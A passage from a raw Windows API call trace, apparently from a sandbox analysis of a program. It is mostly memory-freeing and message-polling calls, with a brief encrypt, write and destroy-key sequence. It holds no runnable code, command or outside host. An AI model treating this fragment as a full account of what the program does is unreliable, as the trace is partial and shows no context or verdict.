lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0207.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0207.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0207.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab008, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.066] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0207.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.066] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0207.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.067] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.067] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.067] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaf18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.067] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71b88*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71b88*, pdwDataLen=0x8cef60*=0x8) returned 1 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.067] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0207.067] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.067] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0207.067] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.067] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0207.067] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.068] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0207.068] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.068] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.068] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.068] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.068] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.068] WriteFile (in: hFile=0x520, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0207.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.069] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0207.069] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.069] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0207.069] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.069] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.069] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.069] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0207.069] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.069] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0207.070] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0207.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0207.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaad50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0207.070] CryptDestroyKey (hKey=0x9e1eb8) returned 1 [0207.070] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.070] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.070] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0207.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0207.070] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0207.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0207.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0207.070] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0207.070] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0207.070] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0207.070] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0207.070] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0207.070] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0207.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0207.071] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.072] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0207.072] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.072] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.072] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0207.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.072] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0207.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.072] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0207.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.072] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0207.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.073] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.073] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.073] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.073] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.073] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.073] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.073] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.073] WideCharToMultiByte (in: CodePage=0x0, 